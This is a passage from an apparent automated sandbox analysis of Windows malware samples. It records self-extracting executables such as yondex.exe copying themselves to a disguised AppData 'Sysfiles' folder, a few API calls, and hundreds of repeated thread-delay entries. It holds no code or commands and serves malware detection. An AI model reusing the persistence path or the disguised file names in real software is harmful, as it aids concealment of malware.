0007FF7AB4BB190
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4CFCA0 FindFirstFileExA,3_2_00007FF7AB4CFCA0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559516A4 VirtualQuery,GetSystemInfo,0_2_00007FF6559516A4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599304Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599202Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598967Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598858Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598745Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598342Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597544Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599688Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599266Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599104Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598907Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597030Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596657Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596275Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596104Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595172Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594938Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599810
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599562
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599156
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598796
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598164
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597843
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597640
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597455
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597281
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597124
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596921
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596718
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596542
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596156
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595994
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595734
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595375
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594906
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594701
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599469
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599265
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599031
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598812
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598406
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598187
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598031
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597574
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597390
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596890
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596778
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596658
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596498
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596338
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596217
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596052
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595807
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595685
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595546
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595378
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595234
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595102
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594961
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594806
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594661
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594386
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 593936
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 593797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 593640
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 593530
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 593393
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 593234
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 593104
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 592937
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 592820
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 592672
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 592515
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 592375
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 592234
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 592098
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 591922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 591783
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 591640
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 591469
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 591312
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 591186
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 591047
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 590911
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 590777
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 590653
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 590530
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 590390
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 590250
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 590109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589993
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589859
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589723
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589585
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589281
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589156
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 589026
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 588901
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 588763
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 588621
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 588475
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 588337
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 588210
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 588071
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587943
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587484
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587202
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587047
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586906
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586778
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586609
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586286
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586154
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585719
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585094
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584903
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584647
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584509
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584346
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583908
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583750
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583621
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583498
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583204
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583047
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582645
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582070
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581490
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581344
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581086
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580945
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580526
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580400
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580258
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579708
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579424
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579297
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579160
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579005
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578868
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578731
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578449
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578322
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578186
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578060
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577934
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577804
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577659
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577515
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577368
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577234
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576960
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576651
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576499
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576344
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576187
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576054
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575890
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575634
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575487
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575218
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574951
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574812
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574681
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574531
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574394
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574258
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573920
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573646
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573510
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573362
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573064
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572791
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572659
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572377
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572236
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572107
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571980
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571712
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571422
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571285
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571154
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571026
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570760
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570616
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570471
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570182
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570047
